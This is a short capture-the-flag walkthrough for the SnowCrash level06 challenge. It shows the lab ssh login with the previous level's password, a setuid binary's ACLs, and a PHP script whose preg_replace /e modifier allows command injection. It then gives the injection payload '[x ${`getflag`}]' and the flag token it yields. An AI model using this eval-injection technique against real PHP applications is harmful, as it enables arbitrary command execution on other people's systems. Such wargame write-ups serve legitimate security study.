Level06 - snow_crash

Connect with the previous password "viuaaale9huek52boumoomioc"
	ssh -p 4242 level06@192.168.1.20 

We can see that we have the right to read and execute the level06 file

	level06@SnowCrash:~$ getfacl level06
	# file: level06
	# owner: flag06
	# group: level06
	# flags: s--
	user::rwx
	group::---
	group:level06:r-x
	mask::r-x
	other::---

And we have a php file 
	<?php

	function y($m) { 
		$m = preg_replace("/\./", " x ", $m); 					# replace every "." by " x "
		$m = preg_replace("/@/", " y", $m);  					# replace "@" by " y"
		return $m; 
	}

	function x($y, $z) { 
		$a = file_get_contents($y);								# get the content of this file
		$a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a); # replace [x(.*)] with what return from y(\"\\2\")
		$a = preg_replace("/\[/", "(", $a); 					# replace every "[" by "("
		$a = preg_replace("/\]/", ")", $a); 					# replace every "]" by ")" 
		return $a; 
	}
	$r = x($argv[1], $argv[2]); print $r;
	?>

We see that level06 file launch php file level06.php

we going to pass it a file that will be launch by php, 
	go to tmp and create a file, put this inside : 
	[x ${`getflag`}]
	./level06 /tmp/test

PHP Notice:  Undefined variable: Check flag.Here is your token : wiok45aaoguiboiki2tuin6ub
